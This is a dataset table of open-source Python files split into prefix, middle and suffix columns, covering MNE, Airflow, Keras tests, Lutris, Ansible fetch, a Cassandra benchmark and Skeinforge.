repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
effigies/mne-python | mne/io/write.py | Python | bsd-3-clause | 14,593 | 0.001576 | # Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
from ..externals.six import string_types, b
import time
import numpy as np
from scipy import linalg
import os.path as op
import re
import uuid
from .constants import FIFF
from ..utils import logger
from ..externals.jdcal import jcal2jd
from ..fixes import gzip_open
def _write(fid, data, kind, data_size, FIFFT_TYPE, dtype):
if isinstance(data, np.ndarray):
data_size *= data.size
# XXX for string types the data size is used as
# computed in ``write_string``.
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_TYPE, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(data, dtype=dtype).tostring())
def write_int(fid, kind, data):
"""Writes a 32-bit integer tag to a fif file"""
data_size = 4
data = np.array(data, dtype='>i4').T
_write(fid, data, kind, data_size, FIFF.FIFFT_INT, '>i4')
def write_double(fid, kind, data):
"""Writes a double-precision floating point tag to a fif file"""
data_size = 8
data = np.array(data, dtype='>f8').T
_write(fid, data, kind, data_size, FIFF.FIFFT_DOUBLE, '>f8')
def write_float(fid, kind, data):
"""Writes a single-precision floating point tag to a fif file"""
data_size = 4
data = np.array(data, dtype='>f4').T
_write(fid, data, kind, data_size, FIFF.FIFFT_FLOAT, '>f4')
def write_dau_pack16(fid, kind, data):
"""Writes a dau_pack16 tag to a fif file"""
data_size = 2
data = np.array(data, dtype='>i2').T
_write(fid, data, kind, data_size, FIFF.FIFFT_DAU_PACK16, '>i2')
def write_complex64(fid, kind, data):
"""Writes a 64 bit complex floating point tag to a fif file"""
data_size = 8
data = np.array(data, dtype='>c8').T
_write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_FLOAT, '>c8')
def write_complex128(fid, kind, data):
"""Writes a 128 bit complex floating point tag to a fif file"""
data_size = 16
data = np.array(data, dtype='>c16').T
_write(fid, data, kind, data_size, FIFF.FIFFT_COMPLEX_FLOAT, '>c16')
def write_julian(fid, kind, data):
"""Writes a Julian-formatted date to a FIF file"""
assert len(data) == 3
data_size = 4
jd = np.sum(jcal2jd(*data))
data = np.array(jd, dtype='>i4')
_write(fid, data, kind, data_size, FIFF.FIFFT_JULIAN, '>i4')
def write_string(fid, kind, data):
"""Writes a string tag"""
str_data = data.encode('utf-8') # Use unicode or bytes depending on Py2/3
data_size = len(str_data) # therefore compute size here
my_dtype = '>a' # py2/3 compatible on writing -- don't ask me why
_write(fid, str_data, kind, data_size, FIFF.FIFFT_STRING, my_dtype)
def write_name_list(fid, kind, data):
"""Writes a colon-separated list of names
Parameters
----------
data : list of strings
"""
write_string(fid, kind, ':'.join(data))
def write_float_matrix(fid, kind, mat):
"""Writes a single-precision floating-point matrix tag"""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_FLOAT = FIFF.FIFFT_FLOAT | FIFFT_MATRIX
data_size = 4 * mat.size + 4 * (mat.ndim + 1)
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_FLOAT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>f4').tostring())
dims = np.empty(mat.ndim + 1, dtype=np.int32)
dims[:mat.ndim] = mat.shape[::-1]
dims[-1] = mat.ndim
fid.write(np.array(dims, dtype='>i4').tostring())
def write_double_matrix(fid, kind, mat):
"""Writes a double-precision floating-point matrix tag"""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_DOUBLE = FIFF.FIFFT_DOUBLE | FIFFT_MATRIX
data_size = 8 * mat.size + 4 * (mat.ndim + 1)
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_DOUBLE, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>f8').tostring())
dims = np.empty(mat.ndim + 1, dtype=np.int32)
dims[:mat.ndim] = mat.shape[::-1]
dims[-1] = mat.ndim
fid.write(np.array(dims, dtype='>i4').tostring())
def write_int_matrix(fid, kind, mat):
"""Writes integer 32 matrix tag"""
FIFFT_MATRIX = 1 << 30
FIFFT_MATRIX_INT = FIFF.FIFFT_INT | FIFFT_MATRIX
data_size = 4 * mat.size + 4 * 3
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_MATRIX_INT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFV_NEXT_SEQ, dtype='>i4').tostring())
fid.write(np.array(mat, dtype='>i4').tostring())
dims = np.empty(3, dtype=np.int32)
dims[0] = mat.shape[1]
dims[1] = mat.shape[0]
dims[2] = 2
fid.write(np.array(dims, dtype='>i4').tostring())
def get_machid():
"""Get (mostly) unique machine ID
Returns
-------
ids : array (length 2, int32)
The machine identifier used in MNE.
"""
mac = b('%012x' %uuid.getnode()) # byte conversion for Py3
mac = re.findall(b'..', mac) # split string
mac += [b'00', b'00'] # add two more fields
# Convert to integer in reverse-order (for some reason)
from codecs import encode
mac = b''.join([encode(h, 'hex_codec') for h in mac[::-1]])
ids = np.flipud(np.fromstring(mac, np.int32, count=2))
return ids
def write_id(fid, kind, id_=None):
"""Writes fiff id"""
id_ = _generate_meas_id() if id_ is None else id_
FIFFT_ID_STRUCT = 31
FIFFV_NEXT_SEQ = 0
data_size = 5 * 4 # The id comprises five integers
fid.write(np.array(kind, dtype='>i4').tostring())
fid.write(np.array(FIFFT_ID_STRUCT, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.array(FIFFV_NEXT_SEQ, dtype='>i4').tostring())
# Collect the bits together for one write
data = np.empty(5, dtype=np.int32)
data[0] = id_['version']
data[1] = id_['machid'][0]
data[2] = id_['machid'][1]
data[3] = id_['secs']
data[4] = id_['usecs']
fid.write(np.array(data, dtype='>i4').tostring())
def start_block(fid, kind):
"""Writes a FIFF_BLOCK_START tag"""
write_int(fid, FIFF.FIFF_BLOCK_START, kind)
def end_block(fid, kind):
"""Writes a FIFF_BLOCK_END tag"""
write_int(fid, FIFF.FIFF_BLOCK_END, kind)
def start_file(fname, id_=None):
"""Opens a fif file for writing and writes the compulsory header tags
Parameters
----------
fname : string | fid
The name of the file to open. It is recommended
that the name ends with .fif or .fif.gz. Can also be an
already opened file.
id_ : dict | None
ID to use for the FIFF_FILE_ID.
"""
if isinstance(fname, string_types):
if op.splitext(fname)[1].lower() == '.gz':
logger.debug('Writing using gzip')
# defaults to compr | ession level 9, which is barely smaller but much
# slower. 2 offers a good compromise.
fid = gzip_open(fname, "wb", compresslevel=2)
else:
logger.debug('Writing using normal I/O')
fid = open(fname, "wb")
else:
logger.debug('Writing using %s I/O' % type(fname))
fid = fname
fid.seek(0)
# Write t | he compulsory items
write_id(fid, FIFF.FIFF_FILE_ID, id_)
write_int(fid, FIFF.FIFF_DIR_POINTER, -1)
write_int(fid, FIFF.FIFF_FREE_LIST, -1)
return fid
def end_file(fid):
"""Writes the closing tags to a fif file and closes the file"""
data_size = 0
fid.write(np.array(FIFF.FIFF_NOP, dtype='>i4').tostring())
fid.write(np.array(FIFF.FIFFT_VOID, dtype='>i4').tostring())
fid.write(np.array(data_size, dtype='>i4').tostring())
fid.write(np.arra |
hamedhsn/incubator-airflow | airflow/jobs.py | Python | apache-2.0 | 90,563 | 0.001391 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from past.builtins import basestring
from collections import defaultdict, Counter
from datetime import datetime
import getpass
import logging
import socket
import multiprocessing
import os
import signal
import six
import sys
import threading
import time
from time import sleep
import psutil
from sqlalchemy import Column, Integer, String, DateTime, func, Index, or_, and_
from sqlalchemy import update
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm.session import make_transient
from tabulate import tabulate
from airflow import executors, models, settings
from airflow import configuration as conf
from airflow.exceptions import AirflowException
from airflow.models import DAG, DagRun
from airflow.settings import Stats
from airflow.task_runner import get_task_runner
from airflow.ti_deps.dep_context import DepContext, QUEUE_DEPS, RUN_DEPS
from airflow.utils.state import State
from airflow.utils.db import provide_session, pessimistic_connection_handling
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorManager,
SimpleDag,
SimpleDagBag,
list_py_file_paths)
from airflow.utils.email import send_email
from airflow.utils.logging import LoggingMixin
from airflow.utils import asciiart
Base = models.Base
ID_LEN = models.ID_LEN
class BaseJob(Base, LoggingMixin):
"""
Abstract class to be derived for jobs. Jobs are processing items with state
and duration that aren't task instances. For instance a BackfillJob is
a collection of task instance runs, but should have it's own state, start
and end time.
"""
__tablename__ = "job"
id = Column(Integer, primary_key=True)
dag_id = Column(String(ID_LEN),)
state = Column(String(20))
job_type = Column(String(30))
start_date = Column(DateTime())
end_date = Column(DateTime())
latest_heartbeat = Column(DateTime())
executor_class = Column(String(500))
hostname = Column(String(500))
unixname = Column(String(1000))
__mapper_args__ = {
'polymorphic_on': job_type,
'polymorphic_identity': 'BaseJob'
}
__table_args__ = (
Index('job_type_heart', job_type, latest_heartbeat),
)
def __init__(
self,
executor=executors.GetDefaultExecutor(),
heartrate=conf.getfloat('scheduler', 'JOB_HEARTBEAT_SEC'),
*args, **kwargs):
self.hostname = socket.getfqdn()
self.executor = executor
self.executor_class = executor.__class__.__name__
self.start_date = datetime.now()
self.latest_heartbeat = datetime.now()
self.heartrate = heartrate
self.unixname = getpass.getuser()
super(BaseJob, self).__init__(*args, **kwargs)
def is_alive(self):
return (
(datetime.now() - self.latest_heartbeat).seconds <
(conf.getint('scheduler', 'JOB_HEARTBEAT_SEC') * 2.1)
)
def kill(self):
session = settings.Session()
job = session.query(BaseJob).filter(BaseJob.id == self.id).first()
job.end_date = datetime.now()
try:
self.on_kill()
except:
self.logger.error('on_kill() method failed')
session.merge(job)
session.commit()
session.close()
raise AirflowException("Job shut down externally.")
def on_kill(self):
'''
Will be called when an external kill command is received
'''
pass
def heartbeat_callback(self, session=None):
pass
def heartbeat(self):
'''
Heartbeats update the job's entry in the database with a timestamp
for the latest_heartbeat and allows for the job to be killed
externally. This allows at the system level to monitor what is
actually active.
For instance, an old heartbeat for SchedulerJob would mean something
is wrong.
This also allows for any job to be killed externally, regardless
of who is running it or on which machine it is running.
Note that if your heartbeat is set to 60 seconds and you call this
method after 10 seconds of p | rocessing since the last heartbeat, it
will sleep 50 seconds to complete the 60 seconds and keep a steady
heart rate. If you go over 60 seconds before calling it, it won't
sleep at all.
'''
session = settings.Session()
job = session.query(BaseJob).filter_by(id=self.id).one()
make_transient(jo | b)
session.commit()
session.close()
if job.state == State.SHUTDOWN:
self.kill()
# Figure out how long to sleep for
sleep_for = 0
if job.latest_heartbeat:
sleep_for = max(
0,
self.heartrate - (datetime.now() - job.latest_heartbeat).total_seconds())
# Don't keep session open while sleeping as it leaves a connection open
session.close()
sleep(sleep_for)
# Update last heartbeat time
session = settings.Session()
job = session.query(BaseJob).filter(BaseJob.id == self.id).first()
job.latest_heartbeat = datetime.now()
session.merge(job)
session.commit()
self.heartbeat_callback(session=session)
session.close()
self.logger.debug('[heart] Boom.')
def run(self):
Stats.incr(self.__class__.__name__.lower() + '_start', 1, 1)
# Adding an entry in the DB
session = settings.Session()
self.state = State.RUNNING
session.add(self)
session.commit()
id_ = self.id
make_transient(self)
self.id = id_
# Run
self._execute()
# Marking the success in the DB
self.end_date = datetime.now()
self.state = State.SUCCESS
session.merge(self)
session.commit()
session.close()
Stats.incr(self.__class__.__name__.lower() + '_end', 1, 1)
def _execute(self):
raise NotImplementedError("This method needs to be overridden")
@provide_session
def reset_state_for_orphaned_tasks(self, dag_run, session=None):
"""
This function checks for a DagRun if there are any tasks
that have a scheduled state but are not known by the
executor. If it finds those it will reset the state to None
so they will get picked up again.
"""
queued_tis = self.executor.queued_tasks
# also consider running as the state might not have changed in the db yet
running = self.executor.running
tis = list()
tis.extend(dag_run.get_task_instances(state=State.SCHEDULED, session=session))
tis.extend(dag_run.get_task_instances(state=State.QUEUED, session=session))
for ti in tis:
if ti.key not in queued_tis and ti.key not in running:
self.logger.debug("Rescheduling orphaned task {}".format(ti))
ti.state = State.NONE
session.commit()
class DagFileProcessor(AbstractDagFileProcessor):
"""Helps call SchedulerJob.process_file() in a separate process."""
# Counter that increments everytime an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_wh |
Kankroc/pdf2image | pdf2image/__init__.py | Python | mit | 106 | 0.009434 | """
__ | init__ of the pdf2image module
"""
from .pdf2image import convert_from_bytes, con | vert_from_path |
Bismarrck/tensorflow | tensorflow/python/keras/layers/simplernn_test.py | Python | apache-2.0 | 7,269 | 0.002339 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless | required by applic | able law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SimpleRNN layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.framework import test_util as tf_test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training.rmsprop import RMSPropOptimizer
@keras_parameterized.run_all_keras_modes
class SimpleRNNLayerTest(keras_parameterized.TestCase):
def test_return_sequences_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.SimpleRNN,
kwargs={'units': units,
'return_sequences': True},
input_shape=(num_samples, timesteps, embedding_dim))
def test_dynamic_behavior_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer = keras.layers.SimpleRNN(units, input_shape=(None, embedding_dim))
model = keras.models.Sequential()
model.add(layer)
model.compile(RMSPropOptimizer(0.01), 'mse')
x = np.random.random((num_samples, timesteps, embedding_dim))
y = np.random.random((num_samples, units))
model.train_on_batch(x, y)
def test_dropout_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.SimpleRNN,
kwargs={'units': units,
'dropout': 0.1,
'recurrent_dropout': 0.1},
input_shape=(num_samples, timesteps, embedding_dim))
def test_implementation_mode_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
for mode in [0, 1, 2]:
testing_utils.layer_test(
keras.layers.SimpleRNN,
kwargs={'units': units,
'implementation': mode},
input_shape=(num_samples, timesteps, embedding_dim))
def test_constraints_SimpleRNN(self):
embedding_dim = 4
layer_class = keras.layers.SimpleRNN
k_constraint = keras.constraints.max_norm(0.01)
r_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_constraint=k_constraint,
recurrent_constraint=r_constraint,
bias_constraint=b_constraint)
layer.build((None, None, embedding_dim))
self.assertEqual(layer.cell.kernel.constraint, k_constraint)
self.assertEqual(layer.cell.recurrent_kernel.constraint, r_constraint)
self.assertEqual(layer.cell.bias.constraint, b_constraint)
def test_with_masking_layer_SimpleRNN(self):
layer_class = keras.layers.SimpleRNN
inputs = np.random.random((2, 3, 4))
targets = np.abs(np.random.random((2, 3, 5)))
targets /= targets.sum(axis=-1, keepdims=True)
model = keras.models.Sequential()
model.add(keras.layers.Masking(input_shape=(3, 4)))
model.add(layer_class(units=5, return_sequences=True, unroll=False))
model.compile(loss='categorical_crossentropy',
optimizer=RMSPropOptimizer(0.01))
model.fit(inputs, targets, epochs=1, batch_size=2, verbose=1)
def test_from_config_SimpleRNN(self):
layer_class = keras.layers.SimpleRNN
for stateful in (False, True):
l1 = layer_class(units=1, stateful=stateful)
l2 = layer_class.from_config(l1.get_config())
assert l1.get_config() == l2.get_config()
def test_statefulness_SimpleRNN(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer_class = keras.layers.SimpleRNN
model = keras.models.Sequential()
model.add(
keras.layers.Embedding(
4,
embedding_dim,
mask_zero=True,
input_length=timesteps,
batch_input_shape=(num_samples, timesteps)))
layer = layer_class(
units, return_sequences=False, stateful=True, weights=None)
model.add(layer)
model.compile(optimizer=gradient_descent.GradientDescentOptimizer(0.01),
loss='mse')
out1 = model.predict(np.ones((num_samples, timesteps)))
self.assertEqual(out1.shape, (num_samples, units))
# train once so that the states change
model.train_on_batch(
np.ones((num_samples, timesteps)), np.ones((num_samples, units)))
out2 = model.predict(np.ones((num_samples, timesteps)))
# if the state is not reset, output should be different
self.assertNotEqual(out1.max(), out2.max())
# check that output changes after states are reset
# (even though the model itself didn't change)
layer.reset_states()
out3 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out2.max(), out3.max())
# check that container-level reset_states() works
model.reset_states()
out4 = model.predict(np.ones((num_samples, timesteps)))
np.testing.assert_allclose(out3, out4, atol=1e-5)
# check that the call to `predict` updated the states
out5 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out4.max(), out5.max())
# Check masking
layer.reset_states()
left_padded_input = np.ones((num_samples, timesteps))
left_padded_input[0, :1] = 0
left_padded_input[1, :2] = 0
out6 = model.predict(left_padded_input)
layer.reset_states()
right_padded_input = np.ones((num_samples, timesteps))
right_padded_input[0, -1:] = 0
right_padded_input[1, -2:] = 0
out7 = model.predict(right_padded_input)
np.testing.assert_allclose(out7, out6, atol=1e-5)
class SimpleRNNLayerGraphOnlyTest(test.TestCase):
# b/120919032
@tf_test_util.run_deprecated_v1
def test_regularizers_SimpleRNN(self):
embedding_dim = 4
layer_class = keras.layers.SimpleRNN
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_regularizer=keras.regularizers.l1(0.01),
recurrent_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l2',
activity_regularizer='l1')
layer.build((None, None, 2))
self.assertEqual(len(layer.losses), 3)
x = keras.backend.variable(np.ones((2, 3, 2)))
layer(x)
self.assertEqual(len(layer.get_losses_for(x)), 1)
if __name__ == '__main__':
test.main()
|
Thortoise/Super-Snake | Blender/animation_nodes-master/nodes/spline/splines_from_edges.py | Python | gpl-3.0 | 752 | 0.006649 | import bpy
from ... base_types.node import AnimationNode
from ... data_structures.splines.poly_spline import PolySpline
class SplinesFromEdgesNode(bpy.types.Node, AnimationNode):
bl_idname = "an_SplinesFromEdgesNode"
bl_label = "Splines from Edges"
def create(self):
self.newInput("Vector List", "Vertices", "vertices", dataIsModified = True)
self.newInput("Edge Indices List", "Edge Indices", "edgeIndices")
self.newOutput("Spline List", "Splines" | , "splines")
def execute(self, vertices, edgeIndices):
splines = []
for index1, index2 in edgeIndices:
spline = PolySpline.fro | mLocations([vertices[index1], vertices[index2]])
splines.append(spline)
return splines
|
malkavi/lutris | lutris/util/runtime.py | Python | gpl-3.0 | 1,774 | 0 | import os
from lutris.util import http
from lutris.util import extract
from lutris import settings
LOCAL_VERSION_PATH = os.path.join(settings.RUNTIME_DIR, "VERSION")
def parse_version(version_content):
try:
version = int(version_content)
except ValueError:
version = 0
return version
def get_local_version():
if not os.path.exists(LOCAL_VERSION_PATH):
return 0
with open(LOCAL_VERSION_PATH, 'r') as version_file:
version_content = version_file.read().strip()
return parse_version(version_content)
def get_remote_version():
version_url = settings.RUNTIME_URL + "VERSION"
version_content = http.download_content(version_url)
return parse_version(version_content)
def update_runtime():
remote_version = get_remote_version()
local_version = get_local_version()
if remote_version <= local_version:
return
runtime32_file = "lutris-runtime-i386.tar.gz"
runtime64_file = "lutris-runtime-amd64.tar.gz"
runtime32_path = os.path.join(settings.RUNTIME_DIR, runtime32_file)
http.download_asset(setti | ngs.RUNTIME_URL + runtime32_file, runtime32_path,
overwrite=True)
runtime64_path = os.path.j | oin(settings.RUNTIME_DIR, runtime64_file)
http.download_asset(settings.RUNTIME_URL + runtime64_file, runtime64_path,
overwrite=True)
extract.extract_archive(runtime32_path, settings.RUNTIME_DIR,
merge_single=False)
extract.extract_archive(runtime64_path, settings.RUNTIME_DIR,
merge_single=False)
os.unlink(runtime32_path)
os.unlink(runtime64_path)
with open(LOCAL_VERSION_PATH, 'w') as version_file:
version_file.write(str(remote_version))
|
wehkamp/ansible | lib/ansible/plugins/action/fetch.py | Python | gpl-3.0 | 7,278 | 0.003572 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import random
import traceback
import tempfile
import base64
from ansible import constants as C
from ansible.errors import *
from ansible.plugins.action import ActionBase
from ansible.utils.boolean import boolean
from ansible.utils.hashing import checksum, checksum_s, md5, secure_hash
from ansible.utils.path import makedirs_safe
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=dict()):
''' handler for fetch operations '''
# FIXME: is this even required anymore?
#if self.runner.noop_on_check(inject):
# return ReturnData(conn=conn, comm_ok=True, result=dict(skipped=True, msg='check mode not (yet) supported for this module'))
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if 'validate_md5' in self._task.args and 'validate_checksum' in self._task.args:
return dict(failed=True, msg="validate_checksum and validate_md5 cannot both be specified")
if source is None or dest is None:
return dict(failed=True, msg="src and dest are required")
source = self._shell.join_path(source)
source = self._remote_expand_user(source, tmp)
# calculate checksum for the remote file
remote_checksum = self._remote_checksum(tmp, source)
# use slurp if sudo and permissions are lacking
remote_data = None
if remote_checksum in ('1', '2') or self._connection_info.become:
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('rc') == 0:
if slurpres['encoding'] == 'base64':
remote_data = base64.b64decode(slurpres['content'])
if remote_data is not None:
remote_checksum = checksum_s(remote_data)
# the source path may have been expanded on the
# target system, so we compare it here and use the
# expanded version if it's different
remote_source = slurpres.get('source')
if remote_source and remote_source != source:
source = remote_source
else:
# FIXME: should raise an error here? the old code did nothing
pass
# calculate the destination name
if os.path.sep not in self._shell.join_path('a', ''):
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
# if the path ends with "/", we'll use the source filename as the
# destination filename
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if not dest.startswith("/"):
# if dest does not start with "/", we'll assume a relative path
dest = self._loader.path_dwim(dest)
else:
# files are saved in dest dir, with a subdir for each host, then the filename
if 'inventory_hostname' in task_vars:
target_name = task_vars['inventory_hostname']
else:
target_name = self._connection_info.remote_addr
dest = "%s/%s/%s" % (self._loader.path_dwim(dest), target_name, source_local)
dest = dest.replace("//","/")
if remote_checksum in ('0', '1', '2', '3', '4'):
# these don't fail because you may want to transfer a log file that possibly MAY exist
# but keep going to fetch other log files
if remote_checksum == '0':
result = dict(msg="unable to calculate the checksum of the remote file", file=source, changed=False)
elif remote_checksum == '1':
if fail_on_missing:
result = dict(failed=True, msg="the remote file does not exist", file=source)
else:
result = dict(msg="the remote file does not exist, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '2':
result = dict(msg="no read permission on remote file, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '3':
result = dict(msg="remote file is a directory, fetch cannot work on directories", file=source, changed=False)
elif remote_checksum == '4':
result = dict(msg="python isn't present on the system. Unable to compute checksum", file=source, changed=False)
return result
# calculate checksum for the local file
local_checksum = checksum(dest)
if remote_checksum != local_checksum:
# create the containing directories, if needed
makedirs_safe(os.path.dirname(dest))
# fetch the file and check for changes
if remote_data is None:
self._connection.fetch_file(source, dest)
else:
f = open(dest, 'w')
f.write(remote_data)
f.close()
new_checksum = secure_hash(dest)
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if validate_checksum and new_checksum != remote_checksum:
ret | urn dict(failed=True, md5sum=new_md5, msg="checksum mismatch", file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum)
return dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, r | emote_checksum=remote_checksum)
else:
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
return dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum)
|
bbirand/python-driver | benchmarks/callback_full_pipeline.py | Python | apache-2.0 | 1,906 | 0.000525 | # Cop | yright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apa | che.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from itertools import count
from threading import Event
from base import benchmark, BenchmarkThread
from six.moves import range
log = logging.getLogger(__name__)
sentinel = object()
class Runner(BenchmarkThread):
def __init__(self, *args, **kwargs):
BenchmarkThread.__init__(self, *args, **kwargs)
self.num_started = count()
self.num_finished = count()
self.event = Event()
def insert_next(self, previous_result=sentinel):
if previous_result is not sentinel:
if isinstance(previous_result, BaseException):
log.error("Error on insert: %r", previous_result)
if next(self.num_finished) >= self.num_queries:
self.event.set()
if next(self.num_started) <= self.num_queries:
future = self.session.execute_async(self.query, self.values, timeout=None)
future.add_callbacks(self.insert_next, self.insert_next)
def run(self):
self.start_profile()
if self.protocol_version >= 3:
concurrency = 1000
else:
concurrency = 100
for _ in range(min(concurrency, self.num_queries)):
self.insert_next()
self.event.wait()
self.finish_profile()
if __name__ == "__main__":
benchmark(Runner)
|
AlexeyKruglov/Skeinforge-fabmetheus | skeinforge_application/skeinforge_plugins/analyze_plugins/statistic.py | Python | agpl-3.0 | 17,518 | 0.031225 | """
This page is in the table of contents.
Statistic is an extremely valuable analyze plugin to print and/or save the statistics of the generated gcode.
The statistic manual page is at:
http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Statistic
==Operation==
The default 'Activate Statistic' checkbox is on. When it is on, the functions described below will work when called from the skeinforge toolchain, when it is off, the functions will not be called from the toolchain. The functions will still be called, whether or not the 'Activate Statistic' checkbox is on, when statistic is run directly.
==Settings==
===Print Statistics===
Default is on.
When the 'Print Statistics' checkbox is on, the statistics will be printed to the console.
===Save Statistics===
Default is off.
When the 'Save Statistics' checkbox is on, the statistics will be saved as a .txt file.
==Gcodes==
An explanation of the gcodes is at:
http://reprap.org/bin/view/Main/Arduino_GCode_Interpreter
and at:
http://reprap.org/bin/view/Main/MCodeReference
A gode example is at:
http://forums.reprap.org/file.php?12,file=565
==Examples==
Below are examples of statistic being used. These examples are run in a terminal in the folder which contains Screw Holder_penultimate.gcode and statistic.py. The 'Save Statistics' checkbox is selected.
> python statistic.py
This brings up the statistic dialog.
> python statistic.py Screw Holder_penultimate.gcode
Statistics are being generated for the file /home/enrique/Desktop/backup/babbleold/script/reprap/fabmetheus/models/Screw Holder_penultimate.gcode
Cost
Machine time cost is 0.31$.
Material cost is 0.2$.
Total cost is 0.51$.
Extent
X axis extrusion starts at 61 mm and ends at 127 mm, for a width of 65 mm.
Y axis extrusion starts at 81 mm and ends at 127 mm, for a depth of 45 mm.
Z axis extrusion starts at 0 mm and ends at 15 mm, for a height of 15 mm.
Extruder
Build time is 18 minutes 47 seconds.
Distance extruded is 46558.4 mm.
Distance traveled is 58503.3 mm.
Extruder speed is 50.0
Extruder was extruding 79.6 percent of the time.
Extruder was toggled 1688 times.
Operating flow rate is 9.8 mm3/s.
Feed rate average is 51.9 mm/s, (3113.8 mm/min).
Filament
Cross section area is 0.2 mm2.
Extrusion diameter is 0.5 mm.
Extrusion fill density ratio is 0.68
Material
Mass extruded is 9.8 grams.
